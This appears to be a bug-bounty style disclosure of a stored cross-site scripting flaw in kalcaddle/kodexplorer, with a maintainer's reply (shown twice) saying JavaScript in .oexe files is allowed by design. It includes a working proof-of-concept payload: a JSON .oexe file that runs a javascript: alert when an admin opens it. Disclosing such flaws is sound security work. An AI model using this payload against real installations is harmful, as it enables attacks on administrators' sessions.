Cross-site Scripting (XSS) - Stored in kalcaddle/kodexplorer

Valid

Reported on

May 17th 2021

BUG

Stored xss via oexe file upload

ACCOUNT

user A-->admin -->victim
user B -->demo user --> attacker

STEP TO REPRODUCE

from user B account create oexe file with bellow content

{"type":"app","content":"window.open(\"javascript:alert(document.domain)\/\/\");","icon":"trello.png","width":"800","height":"600","simple":0,"resize":1,"undefined":0}

Now upload this file .

Now from user A(admin) double click this file and see xss is executed .

VIDEO POC

check is recorded video https://drive.google.com/file/d/1_1v6NJ4ls79s4w6DnbV8tp7i_Ajtd_GZ/view?usp=sharing

warlee

commented 3 years ago

Maintainer

kodexplorer: a management tool mainly used for personal use; oexe,allow js; kodbox: Used for multi-user network disk storage; oexe,disable js;

to join this conversation

warlee

commented 3 years ago

Maintainer

kodexplorer: a management tool mainly used for personal use; oexe,allow js; kodbox: Used for multi-user network disk storage; oexe,disable js;

to join this conversation